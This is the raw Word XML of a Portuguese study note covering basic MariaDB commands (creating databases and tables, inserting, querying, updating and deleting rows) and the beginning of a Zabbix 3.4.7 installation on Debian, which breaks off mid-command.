          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0031706D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0031706D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//criar banco de dados chamado "</w:t>
      </w:r>
      <w:r w:rsidR="00C92BD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>teste"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92BD2" w:rsidRDefault="00C92BD2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 w:rsidRPr="00C92BD2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GRANT ALL PRIVILEGES ON db_empresa.* TO 'aluno'@'%' IDENTIFIED BY '123';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> //criar o usuário e dar privilégios no banco</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92BD2" w:rsidRDefault="00C92BD2" w:rsidP="00C92BD2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="9923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e dados db_empresa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0AB6" w:rsidRDefault="00BC0AB6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use teste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="0031706D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0031706D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0031706D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//usar o banco de dados teste;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC0AB6" w:rsidRDefault="0031706D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MariaDB [teste]show </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tables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mostrar tabelas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5910" w:rsidRDefault="00DC5910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MariaDB [teste]create table F</w:t>
      </w:r>
      <w:r w:rsidR="00376B85">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">uncionarios (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criar tabela FUNCIONARIOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5910" w:rsidRDefault="00376B85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#Após apertar enter segue as linhas abaixo :</w:t>
      </w:r>
      <w:r w:rsidR="00DC5910">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC5910" w:rsidRDefault="00376B85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-&gt; id int primary key auto_incremen</w:t>
      </w:r>
      <w:r w:rsidR="0058110E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="008766B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B16707">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B16707">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B16707">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B16707">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B16707">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DC5910">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//variável id do tipo inteiro</w:t>
      </w:r>
      <w:r w:rsidR="00B16707">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se auto-incrementa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16707" w:rsidRDefault="00B1670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-&gt; nome varchar(100) not null,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varchar=var charactere; not null = não nulo </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008766B9" w:rsidRDefault="00DC5910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8766B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00376B85">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cargo varchar(100) not null,</w:t>
      </w:r>
      <w:r w:rsidR="00AB0061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AB0061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AB0061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AB0061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AB0061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AB0061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="008766B9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//como não tem nada é um campo null = pode ser nulo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326901" w:rsidRDefault="008766B9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-&gt; salario double </w:t>
      </w:r>
      <w:r w:rsidR="0058110E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>not null</w:t>
      </w:r>
      <w:r w:rsidR="003A7112">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00326901">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00326901">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00326901">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00326901">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00326901">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00326901">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//double=variável real que suporta números grandes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058110E" w:rsidRDefault="0058110E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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> endereco varchar(200) </w:t>
      </w:r>
      <w:r w:rsidR="003A7112">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>null,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0058110E" w:rsidRDefault="0058110E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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> telefone varchar(16) null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00376B85" w:rsidRDefault="00376B85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B40403" w:rsidRDefault="00326901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5456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MariaDB [teste]desc FUNCIONARIOS</w:t>
      </w:r>
      <w:r w:rsidR="005456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="005456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005456B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//describe a table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005456B7" w:rsidRDefault="005456B7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F86BC8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MariaDB [teste]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>insert into FUNCIONARIOS (</w:t>
      </w:r>
      <w:r w:rsidR="00F27A30">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nome, cargo, salario) values ('Nikola Tesla', 'Cientista', 20000.50);</w:t>
      </w:r>
      <w:r w:rsidR="00F86BC8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//inserir dados em uma tabela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86BC8" w:rsidRDefault="00F86BC8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MariaDB [teste]select * from FUNCIONARIOS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Retornar tudo da tabela FUNCIONARIOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00655D0C" w:rsidRDefault="00655D0C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 w:rsidRPr="00655D0C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>select * from Funcionarios where cargo='Gerente de RH';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    //Buscar algo especifico ta tabela</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001750E6" w:rsidRDefault="001750E6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update FUNCIONARIOS set cargo = 'Lider' where id = 1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</w:t>
      </w:r>
      <w:r w:rsidR="009905A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Modificar o cargo do funcionário com id=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009905A5" w:rsidRDefault="009905A5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delete from FUNCIONARIOS where id = 1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deletar a linha co</w:t>
      </w:r>
      <w:r w:rsidR="00EB4A72">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m id = 1 da tabela FUNCIONARIOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005456B7" w:rsidRDefault="00F86BC8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DB3A96" w:rsidRPr="00BC0AB6" w:rsidRDefault="00DB3A96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"/>
        <w:gridCol w:w="2460"/>
        <w:gridCol w:w="1404"/>
        <w:gridCol w:w="1272"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B40403" w:rsidTr="001E43F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00DC5910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B40403" w:rsidRDefault="00DC5910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nome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00DC5910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cargo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00DC5910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salario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B40403" w:rsidTr="001E43F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00F86BC8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403" w:rsidRDefault="00F86BC8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86BC8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nikola Tesla</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00F86BC8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86BC8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cientista</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00F86BC8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86BC8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20000.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B40403" w:rsidTr="001E43F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00F86BC8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0403" w:rsidRDefault="00F86BC8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86BC8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Tiffany Panegalli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="00F86BC8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86BC8">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CisAdmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B40403" w:rsidRDefault="001E43F7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1E43F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>35000.75</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000317F7" w:rsidTr="001E43F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="000317F7" w:rsidRDefault="000317F7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317F7" w:rsidRPr="00F86BC8" w:rsidRDefault="000317F7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0317F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Michel Faraday  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="000317F7" w:rsidRPr="00F86BC8" w:rsidRDefault="000317F7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0317F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fisico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="000317F7" w:rsidRPr="001E43F7" w:rsidRDefault="000317F7" w:rsidP="000C12E3">
            <w:pPr>
              <w:spacing w:line="36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0317F7">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20000.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC5910" w:rsidRPr="00BC0AB6" w:rsidRDefault="00DC5910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B80085" w:rsidRDefault="00DB3A96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rop table FUNCIONARIOS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apagar tabela FUNCIONARIOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3A96" w:rsidRDefault="00DB3A96" w:rsidP="000C1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rop database teste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="00766CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00766CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//apagar um banco de dados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00766CAC" w:rsidRDefault="00766CAC" w:rsidP="000C12E3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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766CAC" w:rsidRDefault="00766CAC" w:rsidP="000C12E3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/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6E1A13" w:rsidRPr="00766CAC" w:rsidRDefault="00766CAC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766CAC">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INSTALAÇÃO DO ZABBIX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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. Debian 9.3 com MariaDB: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apt install build-essential snmp vim libssh2-1-dev libssh2-1 libopenipmi-dev libevent* libpcre* -y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apt install libsnmp-dev wget libcurl4-gnutls-dev fping libxml2 libxml2-dev curl libcurl3-gnutls -y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apt install libcurl3-gnutls-dev libiksemel-dev libiksemel-utils libiksemel3 -y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apt install apache2 php7.0 php7.0-mysql libapache2-mod-php7.0 php7.0-gd libpq5 libpq-dev mysql-server mysql-client libmariadbd-dev -y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apt install php-bcmath php-mbstring php-ldap php-xml php-xmlreader php-xmlwriter -y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2. Criando o banco de dados no MySQL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mysql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MariaDB [(none)]&gt; create database zabbix character set utf8;</w:t>
      </w:r>
      <w:r w:rsidR="00113441">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//criação de banco de dados com suporte à tabela de decodificação utf8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MariaDB [(none)]&gt; GRANT ALL PRIVILEGES ON *.* TO zabbix@localhost IDENTIFIED BY 'zabbix' WITH GRANT OPTION;</w:t>
      </w:r>
      <w:r w:rsidR="00113441">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00113441">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//fornecer todos os privilégios para o usuário zabbix, desde que ele esteja no próprio host onde está instalado o banco de dados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MariaDB [(none)]&gt; quit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3. Configurando o PHP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PHP_FILE = /etc/php/7.0/apache2/php.ini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vi /etc/php/7.0/apache2/php.ini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ate.timezone = "America/Sao_Paulo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max_execution_time = 300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max_input_time = 300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post_max_size = 16M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always_populate_raw_post_data = -1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;date.timezone =/date.timezone = "America\/Sao_Paulo"/g' /etc/php/7.0/apache2/php.ini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max_execution_time = 30/max_execution_time = 300/g' /etc/php/7.0/apache2/php.ini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max_input_time = 60/max_input_time = 300/g' /etc/php/7.0/apache2/php.ini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post_max_size = 8M/post_max_size = 16M/g' /etc/php/7.0/apache2/php.ini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;always_populate_raw_post_data = -1/always_populate_raw_post_data = -1/g' /etc/php/7.0/apache2/php.ini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/etc/init.d/apache2 restart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/etc/init.d/apache2 status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4. Instalando o Zabbix</w:t>
      </w:r>
      <w:r w:rsidR="00110A09">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00110A09">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00110A09">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>//dpkg: instalador de pacotes (.deb); apt: gerente de dependências</w:t>
      </w:r>
      <w:r w:rsidR="000F6997">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> | tarball: instalação de pacotes por compilação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4.1. Criando usuário zabbix e descompactando tarball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adduser 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[Password: zabbix]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[ Baixar a última versão estável]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https://sourceforge.net/projects/zabbix/files/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OBS: Na oportunidade foi usada a versão: zabbix-3.4.7.tar.gz (16.3 MB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* Copiar o arquivo "zabbix-3.4.7.tar.gz" para o diretório /usr/src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cd /usr/src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tar -zxvf zabbix-3.4.7.tar.gz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chmod -R +x zabbix-3.4.7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4.2. Populando o banco de dados no MySQL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 cat zabbix-3.4.7/database/mysql/schema.sql |</w:t>
      </w:r>
      <w:r w:rsidR="00210602">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00766CAC">
        <w:rPr>
